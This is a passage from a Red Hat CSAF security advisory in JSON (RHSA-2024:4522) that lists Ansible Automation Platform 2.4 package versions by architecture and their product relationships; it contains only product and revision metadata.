"name": "Red Hat SDEngine",
"version": "4.6.10"
}
},
"id": "RHSA-2024:4522",
"initial_release_date": "2024-07-12T01:43:40+00:00",
"revision_history": [
{
"date": "2024-07-12T01:43:40+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2024-07-12T01:43:40+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2025-10-24T13:27:38+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product": {
"name": "Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:ansible_automation_platform:2.4::el9"
}
}
},
{
"category": "product_name",
"name": "Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product": {
"name": "Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Inside-1.2",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:ansible_automation_platform_inside:2.4::el9"
}
}
},
{
"category": "product_name",
"name": "Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product": {
"name": "Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:ansible_automation_platform_developer:2.4::el9"
}
}
},
{
"category": "product_name",
"name": "Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product": {
"name": "Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:ansible_automation_platform:2.4::el8"
}
}
},
{
"category": "product_name",
"name": "Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product": {
"name": "Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Inside-1.2",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:ansible_automation_platform_inside:2.4::el8"
}
}
},
{
"category": "product_name",
"name": "Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product": {
"name": "Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:ansible_automation_platform_developer:2.4::el8"
}
}
}
],
"category": "product_family",
"name": "Red Hat Ansible Automation Platform"
},
{
"branches": [
{
"category": "product_version",
"name": "ansible-core-1:2.15.12-1.el9ap.src",
"product": {
"name": "ansible-core-1:2.15.12-1.el9ap.src",
"product_id": "ansible-core-1:2.15.12-1.el9ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ansible-core@2.15.12-1.el9ap?arch=src\u0026epoch=1"
}
}
},
{
"category": "product_version",
"name": "aap-metrics-utility-0:0.3.0-1.el9ap.src",
"product": {
"name": "aap-metrics-utility-0:0.3.0-1.el9ap.src",
"product_id": "aap-metrics-utility-0:0.3.0-1.el9ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/aap-metrics-utility@0.3.0-1.el9ap?arch=src"
}
}
},
{
"category": "product_version",
"name": "automation-controller-0:4.5.8-1.el9ap.src",
"product": {
"name": "automation-controller-0:4.5.8-1.el9ap.src",
"product_id": "automation-controller-0:4.5.8-1.el9ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller@4.5.8-1.el9ap?arch=src"
}
}
},
{
"category": "product_version",
"name": "ansible-core-1:2.15.12-1.el8ap.src",
"product": {
"name": "ansible-core-1:2.15.12-1.el8ap.src",
"product_id": "ansible-core-1:2.15.12-1.el8ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ansible-core@2.15.12-1.el8ap?arch=src\u0026epoch=1"
}
}
},
{
"category": "product_version",
"name": "aap-metrics-utility-0:0.3.0-1.el8ap.src",
"product": {
"name": "aap-metrics-utility-0:0.3.0-1.el8ap.src",
"product_id": "aap-metrics-utility-0:0.3.0-1.el8ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/aap-metrics-utility@0.3.0-1.el8ap?arch=src"
}
}
},
{
"category": "product_version",
"name": "automation-controller-0:4.5.8-1.el8ap.src",
"product": {
"name": "automation-controller-0:4.5.8-1.el8ap.src",
"product_id": "automation-controller-0:4.5.8-1.el8ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller@4.5.8-1.el8ap?arch=src"
}
}
}
],
"category": "architecture",
"name": "src"
},
{
"branches": [
{
"category": "product_version",
"name": "ansible-core-1:2.15.12-1.el9ap.noarch",
"product": {
"name": "ansible-core-1:2.15.12-1.el9ap.noarch",
"product_id": "ansible-core-1:2.15.12-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ansible-core@2.15.12-1.el9ap?arch=noarch\u0026epoch=1"
}
}
},
{
"category": "product_version",
"name": "ansible-test-1:2.15.12-1.el9ap.noarch",
"product": {
"name": "ansible-test-1:2.15.12-1.el9ap.noarch",
"product_id": "ansible-test-1:2.15.12-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ansible-test@2.15.12-1.el9ap?arch=noarch\u0026epoch=1"
}
}
},
{
"category": "product_version",
"name": "automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"product": {
"name": "automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"product_id": "automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-cli@4.5.8-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "automation-controller-server-0:4.5.8-1.el9ap.noarch",
"product": {
"name": "automation-controller-server-0:4.5.8-1.el9ap.noarch",
"product_id": "automation-controller-server-0:4.5.8-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-server@4.5.8-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"product": {
"name": "automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"product_id": "automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-ui@4.5.8-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ansible-core-1:2.15.12-1.el8ap.noarch",
"product": {
"name": "ansible-core-1:2.15.12-1.el8ap.noarch",
"product_id": "ansible-core-1:2.15.12-1.el8ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ansible-core@2.15.12-1.el8ap?arch=noarch\u0026epoch=1"
}
}
},
{
"category": "product_version",
"name": "ansible-test-1:2.15.12-1.el8ap.noarch",
"product": {
"name": "ansible-test-1:2.15.12-1.el8ap.noarch",
"product_id": "ansible-test-1:2.15.12-1.el8ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ansible-test@2.15.12-1.el8ap?arch=noarch\u0026epoch=1"
}
}
},
{
"category": "product_version",
"name": "automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"product": {
"name": "automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"product_id": "automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-cli@4.5.8-1.el8ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "automation-controller-server-0:4.5.8-1.el8ap.noarch",
"product": {
"name": "automation-controller-server-0:4.5.8-1.el8ap.noarch",
"product_id": "automation-controller-server-0:4.5.8-1.el8ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-server@4.5.8-1.el8ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"product": {
"name": "automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"product_id": "automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-ui@4.5.8-1.el8ap?arch=noarch"
}
}
}
],
"category": "architecture",
"name": "noarch"
},
{
"branches": [
{
"category": "product_version",
"name": "aap-metrics-utility-0:0.3.0-1.el9ap.x86_64",
"product": {
"name": "aap-metrics-utility-0:0.3.0-1.el9ap.x86_64",
"product_id": "aap-metrics-utility-0:0.3.0-1.el9ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/aap-metrics-utility@0.3.0-1.el9ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "automation-controller-0:4.5.8-1.el9ap.x86_64",
"product": {
"name": "automation-controller-0:4.5.8-1.el9ap.x86_64",
"product_id": "automation-controller-0:4.5.8-1.el9ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller@4.5.8-1.el9ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64",
"product": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64",
"product_id": "automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-venv-tower@4.5.8-1.el9ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "aap-metrics-utility-0:0.3.0-1.el8ap.x86_64",
"product": {
"name": "aap-metrics-utility-0:0.3.0-1.el8ap.x86_64",
"product_id": "aap-metrics-utility-0:0.3.0-1.el8ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/aap-metrics-utility@0.3.0-1.el8ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "automation-controller-0:4.5.8-1.el8ap.x86_64",
"product": {
"name": "automation-controller-0:4.5.8-1.el8ap.x86_64",
"product_id": "automation-controller-0:4.5.8-1.el8ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller@4.5.8-1.el8ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"product": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"product_id": "automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-venv-tower@4.5.8-1.el8ap?arch=x86_64"
}
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_version",
"name": "aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le",
"product": {
"name": "aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le",
"product_id": "aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/aap-metrics-utility@0.3.0-1.el9ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "automation-controller-0:4.5.8-1.el9ap.ppc64le",
"product": {
"name": "automation-controller-0:4.5.8-1.el9ap.ppc64le",
"product_id": "automation-controller-0:4.5.8-1.el9ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller@4.5.8-1.el9ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"product": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"product_id": "automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-venv-tower@4.5.8-1.el9ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le",
"product": {
"name": "aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le",
"product_id": "aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/aap-metrics-utility@0.3.0-1.el8ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "automation-controller-0:4.5.8-1.el8ap.ppc64le",
"product": {
"name": "automation-controller-0:4.5.8-1.el8ap.ppc64le",
"product_id": "automation-controller-0:4.5.8-1.el8ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller@4.5.8-1.el8ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"product": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"product_id": "automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-venv-tower@4.5.8-1.el8ap?arch=ppc64le"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "aap-metrics-utility-0:0.3.0-1.el9ap.s390x",
"product": {
"name": "aap-metrics-utility-0:0.3.0-1.el9ap.s390x",
"product_id": "aap-metrics-utility-0:0.3.0-1.el9ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/aap-metrics-utility@0.3.0-1.el9ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "automation-controller-0:4.5.8-1.el9ap.s390x",
"product": {
"name": "automation-controller-0:4.5.8-1.el9ap.s390x",
"product_id": "automation-controller-0:4.5.8-1.el9ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller@4.5.8-1.el9ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"product": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"product_id": "automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-venv-tower@4.5.8-1.el9ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "aap-metrics-utility-0:0.3.0-1.el8ap.s390x",
"product": {
"name": "aap-metrics-utility-0:0.3.0-1.el8ap.s390x",
"product_id": "aap-metrics-utility-0:0.3.0-1.el8ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/aap-metrics-utility@0.3.0-1.el8ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "automation-controller-0:4.5.8-1.el8ap.s390x",
"product": {
"name": "automation-controller-0:4.5.8-1.el8ap.s390x",
"product_id": "automation-controller-0:4.5.8-1.el8ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller@4.5.8-1.el8ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"product": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"product_id": "automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-venv-tower@4.5.8-1.el8ap?arch=s390x"
}
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "aap-metrics-utility-0:0.3.0-1.el9ap.aarch64",
"product": {
"name": "aap-metrics-utility-0:0.3.0-1.el9ap.aarch64",
"product_id": "aap-metrics-utility-0:0.3.0-1.el9ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/aap-metrics-utility@0.3.0-1.el9ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "automation-controller-0:4.5.8-1.el9ap.aarch64",
"product": {
"name": "automation-controller-0:4.5.8-1.el9ap.aarch64",
"product_id": "automation-controller-0:4.5.8-1.el9ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller@4.5.8-1.el9ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"product": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"product_id": "automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-venv-tower@4.5.8-1.el9ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "aap-metrics-utility-0:0.3.0-1.el8ap.aarch64",
"product": {
"name": "aap-metrics-utility-0:0.3.0-1.el8ap.aarch64",
"product_id": "aap-metrics-utility-0:0.3.0-1.el8ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/aap-metrics-utility@0.3.0-1.el8ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "automation-controller-0:4.5.8-1.el8ap.aarch64",
"product": {
"name": "automation-controller-0:4.5.8-1.el8ap.aarch64",
"product_id": "automation-controller-0:4.5.8-1.el8ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller@4.5.8-1.el8ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"product": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"product_id": "automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-venv-tower@4.5.8-1.el8ap?arch=aarch64"
}
}
}
],
"category": "architecture",
"name": "aarch64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-core-1:2.15.12-1.el8ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.noarch"
},
"product_reference": "ansible-core-1:2.15.12-1.el8ap.noarch",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-core-1:2.15.12-1.el8ap.src as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.src"
},
"product_reference": "ansible-core-1:2.15.12-1.el8ap.src",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-test-1:2.15.12-1.el8ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el8ap.noarch"
},
"product_reference": "ansible-test-1:2.15.12-1.el8ap.noarch",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el8ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.aarch64"
},
"product_reference": "automation-controller-0:4.5.8-1.el8ap.aarch64",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el8ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.ppc64le"
},
"product_reference": "automation-controller-0:4.5.8-1.el8ap.ppc64le",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el8ap.s390x as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.s390x"
},
"product_reference": "automation-controller-0:4.5.8-1.el8ap.s390x",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el8ap.src as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.src"
},
"product_reference": "automation-controller-0:4.5.8-1.el8ap.src",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el8ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.x86_64"
},
"product_reference": "automation-controller-0:4.5.8-1.el8ap.x86_64",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-cli-0:4.5.8-1.el8ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el8ap.noarch"
},
"product_reference": "automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-server-0:4.5.8-1.el8ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el8ap.noarch"
},
"product_reference": "automation-controller-server-0:4.5.8-1.el8ap.noarch",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-ui-0:4.5.8-1.el8ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el8ap.noarch"
},
"product_reference": "automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64"
},
"product_reference": "automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le"
},
"product_reference": "automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x"
},
"product_reference": "automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64"
},
"product_reference": "automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-core-1:2.15.12-1.el8ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.noarch"
},
"product_reference": "ansible-core-1:2.15.12-1.el8ap.noarch",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4-Inside-1.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-core-1:2.15.12-1.el8ap.src as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.src"
},
"product_reference": "ansible-core-1:2.15.12-1.el8ap.src",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4-Inside-1.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-test-1:2.15.12-1.el8ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el8ap.noarch"
},
"product_reference": "ansible-test-1:2.15.12-1.el8ap.noarch",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4-Inside-1.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "aap-metrics-utility-0:0.3.0-1.el8ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.aarch64"
},
"product_reference": "aap-metrics-utility-0:0.3.0-1.el8ap.aarch64",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le"
},
"product_reference": "aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "aap-metrics-utility-0:0.3.0-1.el8ap.s390x as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.s390x"
},
"product_reference": "aap-metrics-utility-0:0.3.0-1.el8ap.s390x",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "aap-metrics-utility-0:0.3.0-1.el8ap.src as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.src"
},
"product_reference": "aap-metrics-utility-0:0.3.0-1.el8ap.src",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "aap-metrics-utility-0:0.3.0-1.el8ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.x86_64"
},
"product_reference": "aap-metrics-utility-0:0.3.0-1.el8ap.x86_64",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-core-1:2.15.12-1.el8ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.noarch"
},
"product_reference": "ansible-core-1:2.15.12-1.el8ap.noarch",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-core-1:2.15.12-1.el8ap.src as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.src"
},
"product_reference": "ansible-core-1:2.15.12-1.el8ap.src",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-test-1:2.15.12-1.el8ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el8ap.noarch"
},
"product_reference": "ansible-test-1:2.15.12-1.el8ap.noarch",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el8ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.aarch64"
},
"product_reference": "automation-controller-0:4.5.8-1.el8ap.aarch64",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el8ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.ppc64le"
},
